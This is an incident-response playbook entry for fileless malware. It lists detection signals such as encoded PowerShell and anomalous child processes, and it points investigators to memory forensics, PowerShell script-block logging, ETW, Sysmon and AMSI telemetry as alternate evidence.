Fileless Malware With Minimal On-Disk Footprint
The suspected malware runs primarily in memory with minimal or no on-disk persistence. Traditional file-hash IoC hunts return empty, and disk-image analysis misses the active payload. Response must pivot to memory forensics, ETW, PowerShell script-block logging, and AMSI telemetry.
Signals
- •EDR process-creation events show anomalous child processes of legitimate binaries (w3wp.exe, svchost.exe, LSASS) with no corresponding disk write
- •PowerShell execution with -EncodedCommand flags and no script file on disk
- •Network C2 telemetry exists without any matching file-system-resident malicious binary
- •AMSI or Windows Defender flagged in-memory scripts without disk persistence
Pivot Actions
- 1.Capture volatile memory from suspected hosts before any reboot; use Volatility/MemProcFS to extract injected code, hollowed processes, and reflectively-loaded modules
- 2.Enable or dump existing PowerShell script-block logging (Event ID 4104) and PowerShell transcription to recover executed scripts even without disk files
- 3.Review ETW providers (Microsoft-Windows-PowerShell, Microsoft-Antimalware-Scan-Interface) for real-time execution telemetry
- 4.Hunt via process-creation anomalies: rare parent-child chains, process arguments with long base64 payloads, processes with no backing file on disk
- 5.Query AMSI telemetry and Defender detection logs for in-memory malicious content scanned by script engines
Alternate Evidence Sources
- •RAM captures parsed with Volatility/MemProcFS (malfind, ldrmodules, dlllist, hollowfind plugins)
- •PowerShell Event ID 4104 script-block logging records the actual executed script contents
- •Sysmon Event ID 1 (process creation) with command-line logging enabled
- •ETW real-time telemetry for PowerShell, .NET runtime, and AMSI events
- •EDR memory-scan telemetry (CrowdStrike MemScan, SentinelOne RSO) that scans in-memory content